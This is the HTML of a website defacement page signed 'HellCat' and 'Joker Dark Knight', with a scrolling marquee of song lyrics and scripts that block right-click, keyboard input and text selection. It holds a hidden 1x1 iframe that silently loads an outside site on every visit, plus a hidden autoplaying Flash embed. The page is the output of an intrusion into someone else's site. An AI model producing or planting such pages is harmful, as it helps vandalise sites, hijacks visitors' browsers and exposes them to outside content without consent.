
<html>
<head>
<link href="http://fc08.deviantart.net/fs71/f/2012/124/e/5/yao_ming_by_macpulenta-d4yj6yk.jpg" rel="icon">
<title>♥ Hacked By HellCat ♥</title>
<body bgcolor=black
background="http://i782.photobucket.com/albums/yy105/langtukids/samset.gif"
lang=EN-US link=white vlink=white style='tab-interval:.5in' alink="#cc0000"/>
</script>
<SCRIPT TYPE="text/javascript">
var message="Sorry, right-click has been disabled";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
</SCRIPT>
<script language="JavaScript">
function tb5_makeArray(n){
this.length = n;
return this.length;
}
tb5_messages = new tb5_makeArray(4);
tb5_messages[0] = "Hacked By Joker Dark Knight";

tb5_rptType = 'infinite';
tb5_rptNbr = 20;
tb5_speed = 35;
tb5_delay = 2000;
var tb5_counter=2;
var tb5_currMsg=0;
var tb5_stsmsg="";
function tb5_shuffle(arr){
var k;
for (i=0; i&lt;arr.length; i++){
k = Math.round(Math.random() * (arr.length - i - 1)) + i;
temp = arr[i];arr[i]=arr[k];arr[k]=temp;
}
return arr;
}
tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
for (var i=0; i&lt;tb5_messages[tb5_currMsg].length; i++){
tb5_arr[i] = i;
tb5_sts[i] = "_";
}
tb5_arr = tb5_shuffle(tb5_arr);
function tb5_init(n){
var k;
if (n == tb5_arr.length){
if (tb5_currMsg == tb5_messages.length-1){
if ((tb5_rptType == 'finite') &amp;&amp; (tb5_counter==tb5_rptNbr)){
clearTimeout(tb5_timerID);
return;
}
tb5_counter++;
tb5_currMsg=0;
}
else{
tb5_currMsg++;
}
n=0;
tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
for (var i=0; i&lt;tb5_messages[tb5_currMsg].length; i++){
tb5_arr[i] = i;
tb5_sts[i] = "_";
}
tb5_arr = tb5_shuffle(tb5_arr);
tb5_sp=tb5_delay;
}
else{
tb5_sp=tb5_speed;
k = tb5_arr[n];
tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k);
tb5_stsmsg = "";
for (var i=0; i&lt;tb5_sts.length; i++)
tb5_stsmsg += tb5_sts[i];
document.title = tb5_stsmsg;
n++;
}
tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp);
}
function tb5_randomizetitle(){
tb5_init(0);
}
tb5_randomizetitle();

</script><script language="Javascript">
function checartecla (evt)
{if (evt.keyCode == '17')
{alert(&amp;quot;Comando Desativado&amp;quot;)
return false}
return true}
</script><script language="Javascript">
function bloquear(e){return false}
function desbloquear(){return true}
document.onselectstart=new Function (&amp;quot;return false&amp;quot;)
if (window.sidebar){document.onmousedown=bloquear
document.onclick=desbloquear}
</script><script language="Javascript1.2">
var mymessage = "Do not copy! Be creative ";
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function rtclickcheck(keyp){
if (navigator.appName == "Netscape" &amp;&amp; keyp.which == 3) {
alert(mymessage);
return false;

}
if (navigator.appVersion.indexOf("MSIE") != -1 &amp;&amp; event.button == 2) {
alert(mymessage);
return false;
}
}
document.onmousedown = rtclickcheck
</script></head>

<body onkeydown="return false" ondragstart="return false" onselectstart="return false" onLoad="init()">
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta content="text/html; charset=ISO-8859-1" http-equiv="Content-Type">
<meta content="HACKED by Joker Dark Knight" name="keywords">
<meta content="HACKED bY Joker Dark Knight" name="description">

<style type="text/css">
@import url(http://fonts.googleapis.com/css?family=Orbitron%3A700);
body{default;
color:#fff;
}
.top{font-size:40px; text-align:center; margin-top:3px;

}
.style1 { font-size: 50px;
font-weight: bold;
color: gold;
}
h2{
z-index: 1;
top: 10%;
font-family:Orbitron;
width:auto;
text-align: center;
text-shadow: 0 0 3px purple;
transition: 1000ms linear 0s;
-webkit-transition: 1000ms linear 0s;
-webkit-animation: blink 3s infinite;
animation: blink 3s infinite;
-webkit-animation-timing-function: linear;
animation-timing-function: linear;
}
h2:hover,h2:focus{
color:gold;
text-shadow: 0 0 20px #0F0;
}
h2:first-line{
font-size: 150%;
}
h3{
z-index: 1;
font-family:Orbitron;
width:auto;
text-shadow: 0 0 3px #0F0;
transition: 1000ms linear 0s;
-webkit-transition: 1000ms linear 0s;
-webkit-animation: blink 3s infinite;
animation: blink 3s infinite;
-webkit-animation-timing-function: linear;
animation-timing-function: linear;
}
h3:hover,h3:focus{
color:yellow;
text-shadow: 0 0 30px #0F0;
}
h3:first-line{
font-size: 75%;
}

@-webkit-keyframes blink {
0% {text-shadow: 0 0 1px #0F0;}
5%{text-shadow: 0 0 5px #0F0;}
10%{text-shadow: 0 0 10px #0F0;}
15%{text-shadow: 0 0 11px #0F0;}
20%{text-shadow: 0 0 12px #0F0;}
25%{text-shadow: 0 0 13px #0F0;}
30%{text-shadow: 0 0 14px #0F0;}
35%{text-shadow: 0 0 15px #0F0;}
40%{text-shadow: 0 0 16px #0F0;}
45%{text-shadow: 0 0 17px #0F0;}
50% {text-shadow: 0 0 18px #0F0;}
60% {text-shadow: 0 0 17x #0F0;}
70% {text-shadow: 0 0 16x #0F0;}
80% {text-shadow: 0 0 13 #0F0;}
90% {text-shadow: 0 0 10px #0F0;}
100% {text-shadow: 0 0 1px #0F0;}
}@keyframes blink {
0% {text-shadow: 0 0 1px #0F0;}
5%{text-shadow: 0 0 5px #0F0;}
10%{text-shadow: 0 0 10px #0F0;}
15%{text-shadow: 0 0 11px #0F0;}
20%{text-shadow: 0 0 12px #0F0;}
25%{text-shadow: 0 0 13px #0F0;}
30%{text-shadow: 0 0 14px #0F0;}
35%{text-shadow: 0 0 15px #0F0;}
40%{text-shadow: 0 0 16px #0F0;}
45%{text-shadow: 0 0 17px #0F0;}
50% {text-shadow: 0 0 18px #0F0;}
60% {text-shadow: 0 0 17x #0F0;}
70% {text-shadow: 0 0 16x #0F0;}
80% {text-shadow: 0 0 13 #0F0;}
90% {text-shadow: 0 0 10px #0F0;}
100% {text-shadow: 0 0 1px #0F0;}
}

.neon{
color:blue;
text-shadow: 0 0 5px red,0 0 10px red, 0 0 30px orange, 0 0 45px yellow, 0 0 60px red;
}
.neon2{
font-size:15px;
color:yellow;
text-shadow: 0 0 5px pink,0 0 10px pink, 0 0 30px #968, 0 0 45px #968, 0 0 60px #968
}
.neon3{
color:lime;
text-shadow: 0 0 5px pink,0 0 10px pink, 0 0 30px #968, 0 0 45px #968, 0 0 60px #968
}
.hacking{position:absolute;
left:50px; font-size:35px;
}

.like{border:4px double yellow;
box-shadow:0px 2px 20px white;
border-radius:10px;
padding:9px;
height:310px;}

img{border:4px double yellow;
box-shadow:0px 9px 15px white;
border-radius:10px;
opacity:0.75;
-moz-opacity: 0.75;
filter: alpha(opacity=75);

}
a { text-decoration:none; }
a:link { color: #00FF00 }
a:visited { color: #00FF00}
a:hover { color: #00FF00}
a:active { color: #00FF00}
.a{text-shadow:0px 1px 10px lime;}
h3{
font-size:20px;margin:1px auto;text-align:center; color:#fff;
}
#greets{
margin-left:-850px;
}#br{
position: absolute;
top: 0;
width: 100%;
height: 100%;
z-index: -15;
opacity: 0.1;
}

</style><style>
h3{
font-size:20px;margin:1px auto;text-align:center; color:#fff;
}

.neon3{
color:lime;
text-shadow: 0 0 5px pink,0 0 10px pink, 0 0 30px #968, 0 0 45px #968, 0 0 60px #968
}
@keyframes tremer {
0% {transform: rotate(3deg);}
50% {transform: rotate(-3deg);}
100% {transform: rotate(3deg);}
}
@-o-keyframes tremer {
0% {-o-transform: rotate(3deg);}
50% {-o-transform: rotate(-3deg);}
100% {-o-transform: rotate(3deg);}
}
@-moz-keyframes tremer {
0% {-moz-transform: rotate(3deg);}
50% {-moz-transform: rotate(-3deg);}
100% {-moz-transform: rotate(3deg);}
}
@-webkit-keyframes tremer {
0% {-webkit-transform: rotate(3deg);}
50% {-webkit-transform: rotate(-3deg);}
100% {-webkit-transform: rotate(3deg);}
}
img {}
img:hover {
-webkit-animation:tremer 0.2s linear infinite;
-moz-animation:tremer 0.2s linear infinite;
-o-animation:tremer 0.2s linear infinite;
animation:tremer 0.2s linear infinite;
}
</style>
<script language="Javascript1.2">



function rtclickcheck(keyp){

if (navigator.appName == "Netscape" && keyp.which == 3) {

alert(mymessage);

return false;

}



if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {

alert(mymessage);

return false;

}

}



document.onmousedown = rtclickcheck

//-->

</script>

</style>
<center><br><br>
<embed width="900" height="90" align="middle" flashvars="letter= ::.:: Hacked By Joker Dark Knight ::.:: " src="http://langtukids.com/4.swf" quality="high" wmode="transparent" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" color="pink"> </center>
<script type="text/javascript">var open=function(){$("#image").animate({height:300},{duration:2000,queue:false});$("#image").animate({width:400},{duration:2000,queue:false});}
var rotation=function(){$("#image").rotate({duration:3000,angle:0,animateTo:1080,});}
var rotation2=function(){$("#image").rotate3Di(360,1000);setTimeout('rotation2()',3500)}
rotation();open();setTimeout('rotation2()',4800)</script>
<center><font size="9" color="#FFF">
</font><p></p><p align="center" class="MsoNormal"><font size="3" color="green"></font></p><center>
<br>
<br>
<br>
<center><MARQUEE BGCOLOR=#000000 WIDTH=600 HEIGHT=500 DIRECTION=up SCROLLDELAY=1 SCROLLAMOUNT=1> 
<P>&raquo; Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<P>I got money in the bank so we order couple of drinks
<P>Matter of fact, just bring the bottle throw it up, throw it up
<P>Rock the boat until we sink, lot of fishes in the tank
<P>Face around like we be down, but I tell them tear it up
<P>Baby I huff, I puff, I'll blow your house in
<P>In the building like constructions, we don't need no introductions
<P>Single ladies need no drama, they already baby mamas
<P>So the focus for tonight is just put it on the floor
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<P> Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<P>She was glancing by the bar, she unknown but she a star
<P>Come to et's after party, yeah I space shipped at my car
<P>Got my system all equipped we get louder than the club
<P>Face around like we be down, but I tell them tear it up
<P>Easy coming easy go, I'm ready to hit the road
<P>All you ... pimping biznes cause it's all around the globe
<P>Pretty girls they don't get down, yeah I heard it all before
<P>When they turn around and flip it, right down put it on the floor
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa.
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
<br>
<br>
<br>
<br>
<br>
<br>
<P>Hey single ladies, I know you like to party 
<P>Girl come and kick it with me 
<P>Calling all single ladies here tonight 
<P>Let's get it started, whoa, let's get it started, whoa. 
</MARQUEE>
</center>


<br>
<h3><font size="9" color="#000"><font size="25" face="Webdings" color="#000">Y</font></font><font size="3" color="#FFF"><font face="Tahoma">&nbsp;<font color="#FFF">Single Laydies - HellCat - LOLITEAM</font><font size="9" color="#000"><font size="25" face="Webdings" color="#000">Y</font></font></h3>
<!--<span class="neon2">Secure It! </span>-->
<br>

<div class="thanks">
</font></h3>
</span></div>
</font><object width="1" height="1">  <param name="movie" value="http://www.nhaccuatui.com/m/tTkjUrawOh" />  <param name="quality" value="high" />  <param name="wmode" value="transparent" />  <param name="allowscriptaccess" value="always" />  <param name="flashvars" value="autostart=true" />  <embed src="http://www.nhaccuatui.com/m/tTkjUrawOh" flashvars="target=blank&autostart=true" allowscriptaccess="always" quality="high" wmode="transparent" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
<iframe src="http://www.hellcatoffical.com/?m=1" width=1 height=1 style="border:0"></iframe>
</body></html>